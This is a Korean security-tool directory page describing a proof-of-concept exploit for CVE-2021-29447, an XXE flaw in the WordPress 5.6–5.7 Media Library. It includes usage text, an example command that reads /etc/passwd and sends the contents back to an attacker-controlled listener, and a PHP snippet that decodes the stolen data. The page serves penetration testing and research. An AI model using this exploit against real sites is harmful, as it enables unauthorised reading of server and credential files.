Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-29447-PoC — 워드프레스 5.6 미디어 라이브러리 취약점에 대한 개념 증명 익스플로잇 | Kitploit
도구/GitHubGitHub/0xrar/cve-2021-29447-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

워드프레스 5.6 미디어 라이브러리 취약점에 대한 개념 증명 익스플로잇

저장소 보기
613년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-29447 개념 증명

root@kitploit:~
╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023

═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: 파일 업로드 권한이 있는 사용자(예: Author)는 미디어 라이브러리의 XML 구문 분석 문제를 악용하여 XXE 공격을 수행할 수 있습니다. 이 취약점은 WordPress가 PHP 8을 사용하는 경우에만 발생합니다. 성공적인 XXE 공격 시 내부 파일에 접근할 수 있습니다. 이 취약점은 WordPress 버전 5.7.1에서 패치되었으며, 구버전들은 마이너 릴리스를 통해 패치되었습니다.

이 스크립트는 이해하고 실행하기 쉬우며, WordPress 미디어 라이브러리의 XXE 공격을 수행하는 데 필요한 단계를 자동화합니다.

사용법

root@kitploit:~
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            show this help message and exit
  -l LHOST, --lhost LHOST  your server ip address e.g. 10.0.2.15
  -p PORT, --port PORT  your server port e.g. 1337
  -f FILE, --file FILE  system file to read e.g. /etc/passwd

예제:

root@kitploit:~
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

base64를 디코딩하려면 다음 PHP 스니펫을 사용/실행하세요:

root@kitploit:~
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
root@kitploit:~
$ php decode.php

  • 참고 자료:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
도구 다운로드